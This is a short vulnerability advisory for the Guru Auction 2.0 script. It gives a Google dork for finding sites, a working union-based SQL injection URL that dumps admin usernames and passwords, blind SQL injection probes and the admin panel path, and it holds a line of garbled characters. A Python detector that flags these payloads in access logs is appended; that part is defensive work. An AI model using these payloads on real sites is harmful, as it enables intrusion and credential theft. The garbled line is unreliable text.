Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
" ^0 ?2 q$ C$ Q& h- [) o* o5 w
* E2 s: b: o! ^3 m: A- ? : m8 N" D9 P! B
Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
Admin login:
~~~~~~~~~~
http://domain.tld/[path]/admin/
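Both PoCs above abuse parameters (cate_id, item_id) that the application should only ever accept as integers. The following detection script, added here as an example and not part of the original advisory, applies that integer check to the ID parameters of subcat.php and detail.php in web-server access logs and classifies the failures as union-based or boolean-blind injection attempts; the log lines and IP addresses are constructed, the payload strings are the advisory's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and the integer-ID parameters the advisory names for Guru Auction 2.0.
ID_PARAMS = {"subcat.php": "cate_id", "detail.php": "item_id"}

INT_RE = re.compile(r"^-?\d+$")
UNION_RE = re.compile(r"\bunion\b[\s\S]*\bselect\b", re.I)
BLIND_RE = re.compile(r"\b(and|or)\b[\s\S]*(substring|@@version|=)", re.I)
# Apache combined-log request: client IP first, then "GET <url> HTTP/x".
REQ_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def classify_id_param(value):
    """Classify a decoded value the application expects to be an integer ID."""
    # The integer check is also the input validation the vulnerable scripts lack:
    # a value that fails it should never reach the SQL query.
    if INT_RE.match(value):
        return "ok"
    if UNION_RE.search(value):
        return "union-sqli"
    if BLIND_RE.search(value):
        return "blind-sqli"
    return "malformed-id"

def scan_log(lines):
    """Return (client_ip, script, param, verdict) for each non-integer ID value seen."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, url = m.group(1), urlsplit(m.group(2))
        script = url.path.rsplit("/", 1)[-1]
        param = ID_PARAMS.get(script)
        if param is None:
            continue
        # parse_qs decodes %xx and turns '+' into spaces, so we see what MySQL would see.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id_param(value)
            if verdict != "ok":
                hits.append((ip, script, param, verdict))
    return hits

# Constructed sample log (documentation IPs); the two payloads are the advisory's PoC strings.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2012:10:00:00 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2012:10:00:03 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2012:10:00:09 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 8800',
    '203.0.113.9 - - [01/Jan/2012:10:00:12 +0000] "GET /shop/index.php HTTP/1.1" 200 3000',
]
```

Running scan_log(SAMPLE_LOG) flags the second and third requests as union-sqli and blind-sqli respectively; a blind probe typically shows up as a burst of such hits from one client with the comparison value changing between requests.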